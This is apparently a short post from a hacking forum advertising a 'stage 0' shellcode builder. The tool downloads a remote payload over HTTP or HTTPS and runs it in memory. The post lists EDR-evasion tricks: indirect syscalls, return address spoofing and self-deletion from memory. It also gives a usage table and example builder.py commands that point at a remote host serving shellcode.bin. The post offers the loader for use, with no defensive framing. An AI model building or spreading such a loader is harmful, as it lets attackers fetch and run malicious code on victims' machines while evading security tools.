dEEpEst
Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory
The Nt API calls NtAllocateVirtualMemory and NtProtectVirtualMemory are made using indirect syscalls. LoadLibraryA and WinHTTP calls are performed with return address spoofing. When the shellcode is executed in a spoofed thread, the stage 0 self-deletes from memory.
Usage
| Option | Description | Required | Default Value |
|---|---|---|---|
| -e | HTTP endpoint | Yes | |
| -u | HTTP URI | Yes | |
| -p | HTTP port | Yes | |
| -a | User agent | No | Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
| -s | Use TLS | No | Empty |
| -v | View shellcode in C format | No | Empty |
Example (the first option is the endpoint, `-e`, followed by the URI, `-u`):

```
python3 builder.py -e 10.10.100.121 -u /path/to/shellcode.bin -p 80
python3 builder.py -e 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s
python3 builder.py -e 10.10.100.121 -u /path/to/shellcode.bin -p 8080 -v
```
Download: